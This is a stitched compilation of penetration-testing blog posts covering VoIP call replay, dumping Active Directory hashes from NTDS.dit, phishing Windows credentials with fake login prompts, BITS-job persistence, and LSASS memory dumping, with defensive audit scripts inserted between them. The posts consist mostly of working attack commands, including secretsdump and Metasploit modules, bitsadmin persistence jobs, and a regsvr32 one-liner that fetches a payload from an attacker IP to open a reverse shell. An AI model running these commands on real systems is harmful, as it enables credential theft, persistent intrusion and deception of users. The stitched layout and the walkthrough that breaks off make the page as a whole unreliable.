This user replies with a 200 OK message to confirm that the final message has been received correctly. The call was initiated by a user named hacker with the extension 99999999 to extension 00000000. The duration of the call and its current state can be seen in the above example. Wireshark assembled the call packets, and now we can listen to the entire phone call. After disconnecting, we play back the entire phone conversation.
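The flow just described can be reconstructed programmatically from captured messages. The following Python is an added example, not code from the article, Wireshark or Viproy: it parses text-form SIP messages, groups them into transactions by Call-ID and CSeq number as described above, and summarises the call (caller display name, extensions, setup time, talk time and the RTP ports carried in the SDP bodies). The seven messages it parses are constructed to mirror the lab call, with made-up timestamps and Call-ID; the 192.168.1.4 and 192.168.1.7 addresses are the lab's.

```python
"""Reconstruct a SIP call flow from captured messages (added example; not code
from the article, Wireshark or Viproy). Messages are grouped into transactions
by Call-ID and CSeq number, as the article does when reading the Wireshark flow
sequence, and the call is summarised: who called whom, ring time, talk time and
the RTP ports negotiated in SDP. The sample messages below are constructed."""
import re
from dataclasses import dataclass, field

_ADDR = re.compile(r'^(?:"([^"]*)"\s*)?<?sip:([^@>;]+)@')  # display name, user part


@dataclass
class SipMessage:
    ts: float  # capture time in seconds (constructed)
    src: str
    dst: str
    start_line: str
    headers: dict = field(default_factory=dict)
    body: str = ""

    @property
    def is_request(self):
        return not self.start_line.startswith("SIP/2.0 ")

    @property
    def method(self):  # requests name it in the start line, responses echo it in CSeq
        return self.start_line.split()[0] if self.is_request else self.headers["cseq"].split()[1]

    @property
    def cseq_number(self):
        return int(self.headers["cseq"].split()[0])


def parse_sip(ts, src, dst, raw):
    """Split a raw SIP message into start line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return SipMessage(ts, src, dst, lines[0], headers, body)


def parse_address(value):
    """(display name, user part) of a From/To header value."""
    m = _ADDR.match(value)
    if not m:
        raise ValueError(f"unparsable address: {value!r}")
    return m.group(1) or "", m.group(2)


def sdp_audio_port(body):
    """RTP port from the SDP media line 'm=audio <port> ...', else None."""
    for line in body.split("\r\n"):
        if line.startswith("m=audio "):
            return int(line.split()[1])
    return None


def transactions(messages):
    """Group messages into transactions keyed by (Call-ID, CSeq number)."""
    groups = {}
    for m in sorted(messages, key=lambda m: m.ts):
        groups.setdefault((m.headers["call-id"], m.cseq_number), []).append(m)
    return groups


def flow_sequence(messages):
    """One arrow per message, like Wireshark's Flow Sequence window."""
    return [f"{m.src} -> {m.dst}: {m.method if m.is_request else m.start_line.split(' ', 1)[1]}"
            for m in sorted(messages, key=lambda m: m.ts)]


def summarize_call(messages):
    msgs = sorted(messages, key=lambda m: m.ts)
    invite = next(m for m in msgs if m.is_request and m.method == "INVITE")
    answer = next(m for m in msgs if m.start_line.startswith("SIP/2.0 200") and m.method == "INVITE")
    bye = next((m for m in msgs if m.is_request and m.method == "BYE"), None)
    caller_name, from_user = parse_address(invite.headers["from"])
    _, to_user = parse_address(invite.headers["to"])
    return {"caller_name": caller_name, "from": from_user, "to": to_user,
            "setup_seconds": round(answer.ts - invite.ts, 3),  # INVITE until 200 OK
            "duration_seconds": round(bye.ts - answer.ts, 3) if bye else None,
            "rtp_ports": (sdp_audio_port(invite.body), sdp_audio_port(answer.body)),
            "state": "Completed" if bye else "In call",
            "transactions": len(transactions(msgs))}


# Constructed capture: attacker softphone 192.168.1.4 calling through the PBX 192.168.1.7.
_CALLER, _PBX = "192.168.1.4", "192.168.1.7"
_HDRS = ('Via: SIP/2.0/UDP 192.168.1.4:5060\r\nFrom: "hacker" <sip:99999999@192.168.1.7>;tag=a1\r\n'
         "To: <sip:00000000@192.168.1.7>\r\nCall-ID: c1@192.168.1.4\r\n")
_SDP = "Content-Type: application/sdp\r\n\r\nv=0\r\nm=audio %d RTP/AVP 0\r\n"


def sample_messages():
    raw = [
        (0.000, _CALLER, _PBX, "INVITE sip:00000000@192.168.1.7 SIP/2.0\r\n" + _HDRS + "CSeq: 103 INVITE\r\n" + _SDP % 10000),
        (0.010, _PBX, _CALLER, "SIP/2.0 100 Trying\r\n" + _HDRS + "CSeq: 103 INVITE\r\n\r\n"),
        (0.250, _PBX, _CALLER, "SIP/2.0 180 Ringing\r\n" + _HDRS + "CSeq: 103 INVITE\r\n\r\n"),
        (3.100, _PBX, _CALLER, "SIP/2.0 200 OK\r\n" + _HDRS + "CSeq: 103 INVITE\r\n" + _SDP % 14500),
        (3.120, _CALLER, _PBX, "ACK sip:00000000@192.168.1.7 SIP/2.0\r\n" + _HDRS + "CSeq: 103 ACK\r\n\r\n"),
        (12.300, _CALLER, _PBX, "BYE sip:00000000@192.168.1.7 SIP/2.0\r\n" + _HDRS + "CSeq: 104 BYE\r\n\r\n"),
        (12.320, _PBX, _CALLER, "SIP/2.0 200 OK\r\n" + _HDRS + "CSeq: 104 BYE\r\n\r\n"),
    ]
    return [parse_sip(*r) for r in raw]
```

Calling flow_sequence(sample_messages()) gives the same arrow-per-message listing that Wireshark's Flow Sequence window shows; grouping by CSeq number, the rule the article states, puts the ACK in the INVITE transaction (103) and makes the BYE and its 200 OK the second transaction (104).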

When we click the Play Streams button, it asks for the output device, depending on your laptop's audio driver. Then we can click the Play button and hear the conversation that was made on that VoIP call.

This was one of the articles in a series of articles that we are currently researching on VoIP. Stay Tuned for more!

Author: Madhava Rao Yejarla is an Ethical Hacker, Security Analyst, Penetration Tester from India. Contact on LinkedIn or Twitter

The post Penetration Testing on VoIP Asterisk Server appeared first on Hacking Articles.

Credential Dumping: NTDS.dit


In this article, you will learn how passwords are stored in the NTDS.dit file on Windows Server, and then how to dump these credential hashes from the NTDS.dit file.

Table of Content

  • Introduction to NTDS
    • NTDS Partitions
    • Database Storage Table
  • Extracting Credentials by Exploiting NTDS.dit in Multiple Methods
    • FGDump
    • NTDSUtil
    • DSInternals
    • NTDSDumpEx
    • Metasploit
      • NTDS_location
      • NTDS_grabber
      • secretsdump
    • Cracking Hashes

Introduction to NTDS

NTDS stands for New Technologies Directory Services and DIT stands for Directory Information Tree. You can find NTDS file at “C:\Windows\NTDS”. This file acts as a database for Active Directory and stores all its data including all the credentials. The Default size of Ntds.dit is 12 MB which can be extended up to 16TB.

The active directory database is stored in a single NTDS.dit file which is logically separated into the following partitions:


If you take a look at the information that NTDS provides, you can see that the Schema partition contains all the necessary information about objects along with their attributes and their relations to one another. The Configuration partition holds all the forests and trees and is replicated to all the domain controllers. The Domain partition consists of all the information related to the domain. And finally, all the details related to any application are stored in the Application partition of Active Directory. From a different perspective, you can also divide the data found in NTDS into the link table and the data table. The link table has all the attributes that refer to other objects, and the data table contains all the data related to users, groups, etc.

The physical structure of NTDS has EDB.LOG, EDB.CHK, RES1.LOG, RES2.LOG.


Data Store Physical Structure Components

Now that we have an idea about the NTDS, it is time to extract some of those precious hashes from the Server. We have the Windows Server with Active Directory setup in our lab environment for the following practical.

Extracting Credentials by Exploiting NTDS.dit in Multiple Methods

FGDump

FGDump is a tool that was created for mass password auditing of Windows systems. This means that an attacker can use FGDump to extract the passwords from the target machine. For this purpose, we need to download FGDump from this link.

We fire up the Windows command prompt and traverse to the path where we downloaded FGDump; in this case, it is the Downloads directory. As FGDump ships as an executable, we run it directly from the command prompt.

fgdump.exe

As no parameters were provided, FGDump by default did a local dump. After auditing the local passwords, FGDump reported that the password and cache dumps succeeded. Now let's take a look at the dumped data.

FGDump creates a file with the extension .pwdump and dumps the hashes in that file. The name of the server is used as the name of the pwdump file. We can read the file using the type command. As shown in the image below, FGDump has successfully dumped the hashes from the target system.

type <pwdump file name>

Powershell: NTDSUtil

Enough with the Windows command prompt; it's time to move on to PowerShell. We are going to use another executable called NTDSUtil.exe. We launch an instance of PowerShell and run NTDSUtil.exe with a set of parameters instructing it to create a directory called temp on the C:\ drive and to use its Install From Media (ifm) capability to snapshot the Active Directory database, writing the SYSTEM and SECURITY hive files as well as the ntds.dit file there. After working for a while, we have the hive files in the temp directory.

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We transfer the hive files onto our Kali Linux Machine, to extract hashes from them. We will be using the secretsdump.py file from the impacket toolkit to extract hashes. All we need is to provide the path of the SYSTEM hive file and the NTDS.dit file and we are good to go. We see that in a matter of seconds secretsdump extracts hashes for us.

./secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL

DSInternals

DSInternals is a framework designed by Michael Grafnetter for performing AD security audits. It is available in the official PowerShell Gallery, which means we can download it using the Save-Module cmdlet. After downloading, we need to install the module before using it; this can be done using the Install-Module cmdlet. This will require a change in the execution policy. After installing the module, we are good to go.

We first use the Get-BootKey cmdlet to extract the boot key from the SYSTEM hive. After obtaining the boot key, we use it to read the data of one or more accounts from the NTDS file, including secret attributes like hashes, with the Get-ADDBAccount cmdlet.

Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Set-ExecutionPolicy Unrestricted
Import-Module DSInternals
Get-BootKey -SystemHivePath 'C:\SYSTEM'
Get-ADDBAccount -All -DBPath 'C:\ntds.dit' -Bootkey <bootkey value>

The Get-ADDBAccount cmdlet produces a long output. Here we are showing the data of one of the users of the target machine. We can see that we have successfully extracted the NTLM hashes from the NTDS.dit file.

NTDSDumpEx

Now it's time to use some external tools for attacking the NTDS file. We will be using NTDSDumpEx for this particular practical. You can download it from here. We unzip the contents of the compressed file we downloaded and then use the executable to attack the NTDS file. We need to provide the path of the ntds.dit file and the SYSTEM hive file. In no time, NTDSDumpEx gives us a list of the users with their respective hashes.

NTDSDumpEx.exe -d C:\ntds.dit -s C:\SYSTEM

Remote: Metasploit (NTDS_location)

For all the Metasploit fans, there is no need to get depressed: Metasploit works just fine for extracting hashes from the NTDS.dit file. We have two post-exploitation modules that work side by side to target NTDS. The first one locates the NTDS file. We need a session on the target system to move forward. After we gain a session, we choose the ntds_location module and point it at that session. Upon running it, we get the location of the NTDS.dit file.

use post/windows/gather/ntds_location
set session 1
exploit

Metasploit (NTDS_grabber)

Moving on, we use another module that extracts the NTDS.dit file and the SAM and SYSTEM hive files from the target system. The catch is that it transfers these files as a compressed .cab archive.

use post/windows/gather/ntds_grabber
set session 1
exploit

The module works and transfers the cab file to the location shown in the image. Now, to extract NTDS.dit and the hive files, we use a tool called cabextract. This extracts all three files.

cabextract <cab filename>

Now that we have the NTDS and the hive files at our disposal, we can use the impacket’s secretsdump script to extract hashes from it as we did earlier.

Remote: Metasploit (secretsdump)

Suppose a scenario where we were able to procure the login credentials of the server by some method, but it is not possible to access the server directly. We can use this auxiliary module in the Metasploit Framework to extract the hashes from the NTDS.dit file remotely. We need to provide the IP address of the target machine, a username and a password. The auxiliary grabs the hashes and displays them on our screen in a few seconds.

use auxiliary/scanner/smb/impacket/secretsdump
set rhosts 192.168.1.108
set smbuser administrator
set smbpass Ignite@987
exploit

Hash Cracking

To make sure that the hashes we extracted can be cracked, we took one and cracked it using John the Ripper. We need to provide the format of the hash, which is NT. John the Ripper cracks the password in a matter of seconds.

cat hash
john --format=NT hash
john --format=NT hash --show
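Both FGDump and secretsdump write the pwdump line format (user:RID:LM hash:NT hash:::), so a dump like the ones above can be audited before anything is cracked. The Python below is an added example, not code from the article, FGDump, impacket or John the Ripper: it parses that format and reports what a defender wants to know from such a dump: accounts that still have an LM hash stored (LM is far weaker than NT), accounts whose NT hash is that of an empty password, the built-in administrator identified by RID 500 whatever it has been renamed to, and NT hashes shared between accounts, which means the same password is in use. The sample dump is constructed; its hash values are made-up hex and not real hashes, while the two constants for the empty LM and NT hashes are the well-known real values.

```python
"""Audit a pwdump-format hash dump for weak credential states.

Added example; not code from the article, FGDump, impacket or John. The sample
dump is constructed: user names and RIDs are made up and the 32-hex-digit hash
values are placeholders, not real hashes. Only EMPTY_LM and EMPTY_NT are real.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash stored when no LM hash is kept
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
example.local\\raj:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
example.local\\legacy:1105:11223344556677881122334455667788:aaaaaaaabbbbbbbbccccccccdddddddd:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:99999999888888887777777766666666:::
this line is not a hash record
"""


def _is_hex32(s):
    return len(s) == 32 and all(c in "0123456789abcdefABCDEF" for c in s)


def parse_pwdump(text):
    """Return (records, bad_lines); each record has user, rid, lm, nt (hashes lower-cased)."""
    records, bad = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) < 4 or not _is_hex32(parts[2]) or not _is_hex32(parts[3]):
            bad.append((lineno, line))  # keep malformed lines visible rather than dropping them
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        records.append({"user": user, "rid": int(rid) if rid.isdigit() else None, "lm": lm, "nt": nt})
    return records, bad


def audit(records):
    """Findings a defender should act on before the dump ever reaches a cracker."""
    findings = {"lm_stored": [], "empty_password": [], "builtin_admin": [], "shared_nt": []}
    by_nt = defaultdict(list)
    for r in records:
        if r["user"].endswith("$"):
            continue  # machine accounts use long random passwords; not interesting here
        if r["lm"] != EMPTY_LM:
            findings["lm_stored"].append(r["user"])  # LM hashes are trivially crackable
        if r["nt"] == EMPTY_NT:
            findings["empty_password"].append(r["user"])
        if r["rid"] == 500:
            findings["builtin_admin"].append(r["user"])  # renaming does not change the RID
        by_nt[r["nt"]].append(r["user"])
    # the same NT hash on two accounts means the same password (password reuse)
    findings["shared_nt"] = [users for users in by_nt.values() if len(users) > 1]
    return findings


if __name__ == "__main__":
    recs, bad_lines = parse_pwdump(SAMPLE_DUMP)
    for key, value in audit(recs).items():
        print(f"{key}: {value}")
    for lineno, line in bad_lines:
        print(f"skipped line {lineno}: {line!r}")
```

The shared-hash check is the one worth running first on a real dump: it needs no cracking at all, and a hash shared between a service account and a human account is exactly the kind of reuse that turns one compromised secret into several.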

This concludes the various methods by which we can extract the hashes stored on a Windows Server. We included multiple tools to cover the various scenarios that an attacker can face. The only way to protect yourself against such attacks is to minimise the number of users who can access domain controllers, to continuously log and monitor their activity for any changes, and to recertify that access frequently.

Reference: How the Data Store Works

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Credential Dumping: NTDS.dit appeared first on Hacking Articles.


Credential Dumping: Phishing Windows Credentials


This is the ninth article in our series on credential dumping. In this article, we will trigger various scenarios where Windows asks the user to authenticate, and retrieve the credentials they enter. For security purposes, Windows makes it essential to validate user credentials for various operations such as Outlook, User Account Control, or signing in to Windows from the lock screen. We can use this feature to our advantage to dump credentials after establishing a foothold on the target system. To exploit this feature, we will use phishing techniques to harvest the credentials.

Table of Content

  • Metasploit Framework
    • phish_windows_credentials
    • FakeLogonScreen
    • SharpLocker
  • PowerShell Empire
    • Collection/prompt
    • Collection/toasted
  • Koadic
    • Password_box
  • PowerShell
    • Invoke-CredentialsPhish.ps1
    • Invoke-LoginPrompt.ps1
  • Lockphish
  • Conclusion

Metasploit Framework: phish_windows_credentials

Metasploit comes with a built-in post-exploitation module which helps us do the deed. As it is a post-exploitation module, it just needs to be linked with an ongoing session. To use this module, simply type:

use post/windows/gather/phish_windows_credentials
set session 1
exploit

This module waits for a new process to be started by the user. After the initiation of the process, a fake Windows security dialogue box will open, asking for the user credentials as shown in the image below:

As the user enters their credentials, they will be apprehended and displayed as shown in the image below:

FakeLogonScreen

The FakeLogonScreen tool was created by Arris Huijgen. It is developed in C#, which allows various frameworks to inject the utility into memory. We will remotely execute this tool using Metasploit. But first, let's download the tool using the link provided below.

Download FakeLogonScreen

We simply upload this tool from our meterpreter session and then remotely execute it using the following set of commands:

upload /root/FakeLogonScreen.exe .
shell
FakeLogonScreen.exe

Upon execution, it will simulate the Windows lock screen to obtain the password from the user. To do so, this tool renders the lock screen exactly as it is configured so that the user doesn't get suspicious, just as shown in the image below:

It validates the credentials locally or against the domain controller as the user enters them, and then displays them on the console as shown in the image below:

SharpLocker

This tool is very similar to the previous one. It was developed by Matt Pickford. Just like FakeLogonScreen, this tool too exhibits a fake lock screen for the user to enter credentials, and then dumps them keystroke by keystroke to the attacker.

Download SharpLocker

We will first upload this tool from our attacker machine to the target system and then execute it. So, when you have the meterpreter session just type:

upload /root/Downloads/SharpLocker.exe .
shell
SharpLocker.exe

We uploaded the tool to the Desktop, so we traverse to that location and then execute it.

Upon execution the tool will trigger the lock screen of the target system as shown in the image below:

And as the user enters the password, it will capture the keystrokes until the whole password is revealed as shown in the image below:

PowerShell Empire: collection/prompt

This module of the PowerShell Empire will prompt a dialogue box on the target system, asking for credentials like we did earlier. We can use this module with the following commands:

usemodule collection/prompt
execute

Once the user types in the credentials on the dialogue box, the module will display it on the terminal as shown in the image below:

PowerShell Empire: collection/toasted

This module of PowerShell Empire triggers a restart notification like the one generated when updates require a reboot to install. To use this module, type the following commands:

usemodule collection/toasted
execute

Once the module executes, it will show the following dialogue box:

And once the Postpone button is clicked, it will ask for credentials to validate the decision to postpone as shown in the image below:

And as the user enters the credentials, It will print them as shown in the image below:

Koadic

A module similar to the one in PowerShell Empire can be found in Koadic. Once you have a session in Koadic, use the following commands to trigger the dialogue box:

use password_box
execute

When the user enters the username and password in the dialogue box, the password will be displayed in the terminal too as shown in the image below:

PowerShell: Invoke-CredentialsPhish.ps1

There is a PowerShell script that creates a fake login prompt for the user to enter their credentials.

Download Invoke-CredentialsPhish.ps1

To initiate the script, type:

Import-Module C:\Users\raj\Desktop\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish

The execution of the above commands will pop out a prompt asking for credentials as shown in the image below:

So, once the user enters the credentials, they will be displayed on the screen as shown in the image below:

PowerShell: Invoke-LoginPrompt.ps1

Similarly, there is another script, developed by Matt Nelson. This script also opens a dialogue box for the user to enter their password.

Download Invoke-LoginPrompt.ps1

To initiate the script type the following:

Import-Module C:\Users\raj\Desktop\Invoke-LoginPrompt.ps1
Invoke-LoginPrompt

As you can see, the dialogue box appears on the screen; once the user enters the credentials, they are displayed back on the terminal.

Lockphish

Lockphish is another tool that allows us to phish for credentials; you can download it from here. This tool creates a template, hosted on a PHP server, that looks like it is redirecting the user to a YouTube video, but it prompts the user to enter their login credentials and then sends them to the attacker.

Initiate the tool using the following command:

./lockphish.sh

It generates a public link using ngrok as shown in the image above; send that link to the target. When the target opens the link, it asks them to save a file. For this step, strong social engineering skills are required.

Then, upon executing the downloaded file, the lock screen is triggered and the user is forced to enter their credentials as shown in the image below:

And after the user has entered the credentials, it redirects the user to YouTube.

And, we will have our credentials as shown in the image below:

Conclusion

These were various methods that we can use to dump the credentials of the target system. Depending upon the scenario, the appropriate method for dumping the credentials should be used. The PowerShell methods are best for validating the credentials, as the prompt doesn't close until the correct credentials are entered. The Lockphish method doesn't create the lock screen as accurately as the other tools, and it also does not validate the credentials. Hence each method and tool has its advantages and disadvantages, but all of them are fairly good and working.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Credential Dumping: Phishing Windows Credentials appeared first on Hacking Articles.

Windows Persistence using Bits Job


In this article, we are going to describe the ability of the Bits Job process to provide persistent access to the Target Machine.

Table of Content

  • Introduction
  • Configurations used in Practical
  • Manual Persistence
  • Metasploit Persistence
  • Metasploit (file-less) Persistence
  • Mitigation

Introduction

Background Intelligent Transfer Service Admin (BITSAdmin) is a command-line tool that creates download or upload jobs and monitors their progress. BITSAdmin was released with Windows XP. At that time, it used IBackgroundCopyJob as its interface. The upload option of BITSAdmin was introduced with the release of Windows Server 2003. With the release of Windows Vista, we got some additional features like custom HTTP headers, certificate-based client authentication and IPv6 support. The following year, Windows Server 2008 introduced the file transfer notification method. Windows 7 introduced the BranchCache method for BITS transfers. When BITS downloads a file, the actual download is done by the service running inside svchost.exe. BITSAdmin is used to download files from or upload files to HTTP web servers and SMB file shares. It takes the cost of the transfer into account, as well as the network usage, so that the user's foreground work is not affected. BITS can handle network interruptions, pausing and automatically resuming transfers, even after a reboot.

Read more about BITS jobs in our dedicated article here.

Configurations used in Practical

  • Attacker:
    • OS: Kali Linux 2020.1
    • IP: 192.168.1.112
  • Target:
    • OS: Windows 10
    • IP: 192.168.1.102

Manual Persistence

Let's talk about manual persistence. In this scenario, we assume physical access to the target system as well as a meterpreter session on it. After gaining the meterpreter session, upload a payload to the target system which will get us the persistent session.

upload /root/raj.exe C:\

Now, we have the payload named "raj.exe". We will configure a BITS job to execute it at regular intervals. Since we have physical access to the system in this scenario, we will be using a command prompt for the following steps.

First, we create a job named payload; the name can be anything we want. We execute all these commands using BITSAdmin, the tool that handles all BITS jobs.

bitsadmin /create payload

BITS jobs were created to transfer, and mostly download, files from Microsoft servers or any other server for that matter, so a job needs a file added to its configuration before it can move forward. The URL we provide here is bogus; it can be anything, as it has no role except fulfilling BITSAdmin's configuration requirements.

bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"

A BITS job can run a command line when the job finishes (completes or fails). This was meant so that a prompt can be generated after an update is downloaded, or some other task can be done after the download. We will use this notification command to execute the payload that we uploaded earlier with the help of meterpreter.

bitsadmin /SetNotifyCmdLine payload C:\raj.exe NUL

When a BITS download fails, it can retry after a specific delay. This is set using the SetMinRetryDelay option. We use this option to run our payload again and again, so that if we lose the session, the next execution gives us the session again. We set it to 40 seconds here. Now, all we need is to start this job, which can be done using the resume option.

bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload

We went back to our Kali attacker machine and started a multi/handler listener to catch the session generated by the BITS job, configured to match the settings used to create the raj.exe payload. In a moment, we see another meterpreter session spawn. Now, if the configuration is correct, we will get a session every 40 seconds.

Metasploit Persistence

The next scenario is not too different from the previous one. All that changed is that we lost physical access to the system, so we need to create the BITS job remotely. The methods and commands remain the same, except that after we upload the payload, we run the shell command in meterpreter. All the commands that we ran to create the persistence previously, we now run from here.

upload /root/raj.exe C:\
shell
bitsadmin /create payload
bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"
bitsadmin /SetNotifyCmdLine payload C:\raj.exe NUL
bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload

We started the multi/handler listener in the other terminal so that it can capture the session generated by the BITS job that we just configured. Soon enough, we have a new session.

We performed this method to provide the insight that this kind of attack can be performed remotely without any physical access to the system.

Metasploit (file-less) Persistence

In the previous methods, we created a payload and sent it to the target machine. That payload leaves evidence of malicious activity; it can be located by the user or by anti-virus software. So, we thought of creating persistence without sending any file.

Note: This method can still be detected from the BITS logs.

We will be using a malicious one-liner that is executed with regsvr32. First, we need to create the one-liner, using the multi/script/web_delivery module. We configure the exploit options, such as the IP address and port of the attacker machine where we will receive the session. We copy the generated one-liner to our clipboard.

use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 1234
exploit
regsvr32.exe /s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll

Now, we need a meterpreter session on the target system as we had in the previous methods. We run the shell command in meterpreter. Then we create a job; we name it payload as before, though it can be anything we want. Then we add the bogus link that we used in the previous methods. Now it's time to configure the command: here we configure the BITS job to run the malicious one-liner we copied earlier. Then we set the delay and we are good to go.

shell
bitsadmin /create payload
bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"
bitsadmin /SetNotifyCmdLine payload regsvr32.exe "/s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll"
bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload

Back on the attacker machine, our web_delivery module runs a listener of its own. After some time we get the session, which is configured to be persistent.

This concludes the ability of BITS jobs to provide persistent shells on Windows machines. Now let's take a look at some useful mitigations against these kinds of attacks.

Mitigation

Our recommendations for mitigating BITS Jobs are:

  • Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.
  • Reduce the default BITS job lifetime in Group Policy or by editing the “JobInactivityTimeout” and “MaxDownloadTime” Registry values in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS. The default maximum lifetime for a BITS job is 90 days, but that can be modified.
  • Limit the access of the BITSAdmin interface to specific users or groups.
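To act on the points above, here is an audit script added to this article (it is not part of the original post or of the BITS tooling) that lists every BITS job on the host, flags the indicators the walkthrough created, namely a notification command line, a download source outside an allowlist, and a job stuck in an error state because its URL never resolves, and then reads the policy values named in the second bullet. The list of trusted hosts is a constructed placeholder; the script assumes an elevated PowerShell 5.1 or later session, since -AllUsers needs administrator rights.

```powershell
# Added example (not from the original article): audit BITS jobs for persistence indicators.
# Assumes an elevated PowerShell 5.1+ session; Get-BitsTransfer -AllUsers needs administrator rights.
Import-Module BitsTransfer

# Hosts BITS is expected to download from. Constructed placeholder; adjust for your environment.
$trustedHosts = @('download.windowsupdate.com', 'fe2.update.microsoft.com')

$findings = foreach ($job in Get-BitsTransfer -AllUsers) {
    $remoteUrls = @($job.FileList | ForEach-Object { $_.RemoteName })
    $untrusted  = @($remoteUrls | Where-Object {
        $u = $null
        -not ([Uri]::TryCreate($_, [UriKind]::Absolute, [ref]$u)) -or ($u.Host -notin $trustedHosts)
    })

    $reasons = @()
    # SetNotifyCmdLine is what runs the regsvr32 one-liner; legitimate jobs rarely use it.
    if ($job.NotifyCmdLine) { $reasons += "NotifyCmdLine set: $($job.NotifyCmdLine)" }
    if ($untrusted.Count -gt 0) { $reasons += "untrusted source: $($untrusted -join ', ')" }
    # A job whose URL never resolves sits in TransientError/Error until its lifetime expires (90 days by default).
    if ($job.JobState -in 'Suspended', 'TransientError', 'Error' -and $job.CreationTime -lt (Get-Date).AddDays(-1)) {
        $reasons += "stale job in state $($job.JobState)"
    }

    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Name    = $job.DisplayName
            JobId   = $job.JobId
            Owner   = $job.OwnerAccount
            State   = $job.JobState
            Created = $job.CreationTime
            Reasons = $reasons -join '; '
        }
    }
}
$findings | Format-Table -AutoSize -Wrap

# Policy values from the mitigation list. Absent values mean the defaults apply (90-day job lifetime).
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\BITS'
if (Test-Path $policy) {
    Get-ItemProperty -Path $policy | Select-Object JobInactivityTimeout, MaxDownloadTime
} else {
    Write-Warning "No BITS policy key at $policy; JobInactivityTimeout and MaxDownloadTime are at their defaults."
}
```

The legacy equivalent is bitsadmin /list /allusers /verbose, whose NOTIFICATION COMMAND LINE field shows the same value. A flagged job can be removed with Remove-BitsTransfer (or bitsadmin /cancel), which cancels the transfer and deletes its temporary file.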

We at Hacking Articles request everyone to stay at home and self-quarantine to prevent the spread of COVID-19. I am writing this article while working from home. Take care and stay healthy!

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

The post Windows Persistence using Bits Job appeared first on Hacking Articles.

Credential Dumping: Local Security Authority (LSA|LSASS.EXE)


LSA and LSASS stand for "Local Security Authority" and "Local Security Authority Subsystem Service", respectively.

The Local Security Authority (LSA) is a protected system process that authenticates and logs users on to the local computer. Domain credentials are used by the operating system and authenticated by the Local Security Authority (LSA). The LSA can validate user information by checking the Security Accounts Manager (SAM) database located on the same computer.

The LSA runs as a user-mode process (lsass.exe) and stores the security information of a system known as the Local Security Policy. It maintains this information in a set of objects:

  • Policy contains global policy information.
  • TrustedDomain contains information about a trusted domain.
  • Account contains information about a user, group, or local group account.
  • Private Data contains protected information, such as server account passwords. This information is stored as encrypted strings.

LSASS manages the local system policy, user authentication, and auditing while handling sensitive security data such as password hashes and Kerberos keys. The secret part of domain credentials, the password, is protected by the operating system. Only code running in-process with the LSA can read and write domain credentials.

LSASS can store credentials in multiple forms, including:

  • Reversibly encrypted plaintext
  • Kerberos tickets (ticket-granting tickets (TGTs), service tickets)
  • NT hash
  • LAN Manager (LM) hash

LSA (LSASS.EXE) Credential Dumping Walkthrough

Required Tools or Scripts: mimikatz.exe & Invoke-Mimikatz.ps1, ProcDump, PowerShell Empire, Koadic, Metasploit

Host Machine: Windows 7 for the lsass.exe methods and Windows 10 for the LSA methods

Table of Content

  • Windows 7 (lsass.exe) Credential Dump using Mimikatz
  • Windows 10 (LSA) Credential Dump using Mimikatz
  • PowerShell Empire
  • Koadic
  • Metasploit

Windows 7 (lsass.exe) Credential Dump using Mimikatz

Method 1: Task manager

On the target machine, open Task Manager (run it as administrator, since dumping lsass.exe requires SeDebugPrivilege), go to the Processes tab, find lsass.exe, right-click it and choose "Create Dump File". This writes the memory of the process, including the cached credentials, to a minidump.

Task Manager reports where it saved the file; by default it is lsass.DMP in the Temp directory of the user profile, i.e. %LOCALAPPDATA%\Temp.

Now start mimikatz to get the data out of the DMP file using the following command:

privilege::debug
sekurlsa::minidump C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

As you can see from the image below, we have a clear text password.

Method 2: ProcDump

The ProcDump tool is a free command-line tool published by Sysinternals whose primary purpose is monitoring an application and generating memory dumps.

Use the -accepteula option to automatically accept the Sysinternals license agreement and -ma to write a full dump of the process memory (here lsass.exe) to a .dmp file. ProcDump must run elevated for the same reason as Task Manager.

procdump.exe -accepteula -ma lsass.exe mem.dmp

Again, repeat the same steps and use mimikatz to read mem.dmp:

privilege::debug
